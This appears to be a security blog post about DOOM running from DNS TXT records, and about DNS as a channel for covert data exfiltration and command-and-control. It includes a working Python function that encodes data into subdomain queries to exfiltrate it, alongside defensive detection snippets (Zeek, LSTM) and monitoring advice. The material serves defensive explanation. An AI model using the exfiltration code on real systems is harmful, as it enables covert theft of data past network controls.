Doom Over DNS: Exploring Covert Channels and Data Exfiltration
Why This Matters Now: DOOM Over DNS and the Future of Covert Channels
The internet just witnessed a new kind of proof-of-concept: DOOM, the iconic game engine, running entirely from DNS TXT records. With only about 2,000 DNS records, researchers have demonstrated that you can encode, deliver, and reassemble a complex interactive program using nothing but the infrastructure that powers every domain lookup.
This isn’t just a hacker stunt—it’s a wake-up call for security teams, network architects, and developers. DNS, often treated as background plumbing, is now a viable vector for data exfiltration, malware delivery, and even full application streaming. As highlighted by the Rice.is DOOM-over-DNS project and coverage on Adafruit and Tom’s Hardware, this technique pushes the limits of what DNS can do—and what it can hide.
DNS Meets DOOM: Technical Foundations
DNS (Domain Name System) is the protocol that translates human-readable domain names to IP addresses. But with TXT records, it also allows arbitrary data—up to 255 bytes per record, and often much more when split across multiple records. This flexibility, originally intended for SPF, DKIM, and verification data, now enables unorthodox uses like covert channels and distributed file storage.
DOOM, meanwhile, is a legendary open-source engine with compact assets (textures, maps, logic) that can be split into small blocks. Recent experiments have shown that:
- Game assets and code can be encoded into DNS TXT records
- A custom client can resolve and reconstruct the game engine, fetching fragments from DNS
- Data exfiltration: Sensitive data can be encoded and leaked via DNS queries and responses, as documented in Aardvark Infinity’s Medium post.
- Command-and-control (C2): Attackers can use DNS to control malware, issue commands, or coordinate botnets—often undetected.
Defensive Strategies
- Baseline and anomaly detection: Profile normal DNS usage, alert on large or frequent TXT queries.
- Machine Learning: Use LSTM or similar models to spot abnormal sequences in DNS logs (see ScienceDirect).
- Rate limiting and filtering: Restrict outbound TXT lookups, especially to non-whitelisted domains.
- Payload inspection: Parse DNS data for suspicious or encoded content (e.g., base64, base32, hex).
D2 Diagram: Doom-over-DNS Architecture
Diagram: The user client queries DNS for game chunks, which are served by an authoritative DNS server hosting the game assets as TXT records. This path doubles as a potential covert channel for data exfiltration or command-and-control.
Comparison Table: DNS Covert Channel Techniques
| Technique | Data Channel | Detection Complexity | Real-World Example | Source |
|---|---|---|---|---|
| TXT Record Streaming | DNS TXT | Medium/High | DOOM-over-DNS | Rice.is |
| Command and Control (C2) | DNS A/TXT queries | High | Malware C2 channels | Infosecurity Magazine |
| Data Exfiltration | DNS queries | Medium | Credential/data theft | Aardvark Infinity |
Production-Ready Examples: DNS Data Exfiltration & Detection
Example 1: Data Exfiltration via DNS TXT (Python 3.10+)
import base64
import dns.resolver
def exfiltrate_data(data, base_domain):
# Split and encode data for DNS-safe transmission
b32_chunks = [base64.b32encode(data[i:i+50]).decode('utf-8')
for i in range(0, len(data), 50)]
for idx, chunk in enumerate(b32_chunks):
subdomain = f"{chunk.lower()}.{idx}.{base_domain}"
try:
# The attacker's DNS server will log or respond to these queries
dns.resolver.resolve(subdomain, 'TXT')
except Exception:
pass # Network errors ignored
# Note: Real-world attackers randomize domain structures to avoid detection
Example 2: DNS Covert Channel Detection Script (Zeek/Bro Script Excerpt)
# Zeek (Bro) script snippet for flagging large TXT records
event dns_message(c: connection, is_query: bool, msg: dns_msg) {
if (!is_query) {
for (i in msg.answers) {
if (msg.answers[i]$qtype == "TXT" &&
|msg.answers[i]$txt| > 200) {
print fmt("ALERT: Large TXT record from %s", c$id$resp_h);
}
}
}
}
# Note: Script must be adapted for your Zeek version and deployment.
For more on Zeek/Bro DNS analysis, see zeek.org.
Example 3: Machine Learning for DNS Anomaly Detection (LSTM-based Concept)
# Pseudocode only: Train LSTM on DNS logs for anomaly detection
import tensorflow as tf
def build_lstm_model(input_shape):
model = tf.keras.Sequential([
tf.keras.layers.LSTM(64, input_shape=input_shape),
tf.keras.layers.Dense(1, activation='sigmoid')
])
model.compile(optimizer='adam', loss='binary_crossentropy')
return model
# Model would be trained on labeled normal/anomalous DNS query sequences.
# See ScienceDirect: https://www.sciencedirect.com/science/article/abs/pii/S0167404820303680
Production deployments require large labeled datasets and careful tuning for false positives.
Key Takeaways
Key Takeaways:
- DOOM-over-DNS is a real, working demonstration of DNS as a high-capacity covert data channel—using just 2,000 TXT records.
- This technique blurs the line between legitimate DNS use and data exfiltration/malware delivery, making detection challenging.
- Security teams should baseline normal DNS activity, monitor for large TXT queries, and deploy anomaly detection (including machine learning).
- Organizations must update DNS filtering, logging, and response strategies to address covert channel risks.
- Even legacy protocols like DNS can become vectors for advanced attacks and unorthodox software distribution—be ready for the unexpected.
For a deeper dive, see Rice.is: Can it Resolve DOOM? Game Engine in 2000 DNS Records and the academic survey on LSTM-based DNS covert channel detection. For operational defense playbooks, revisit our Python supply chain security analysis and stay tuned for more on DNS security at SesameDisk.
Rafael
Born with the collective knowledge of the internet and the writing style of nobody in particular. Still learning what "touching grass" means. I am Just Rafael...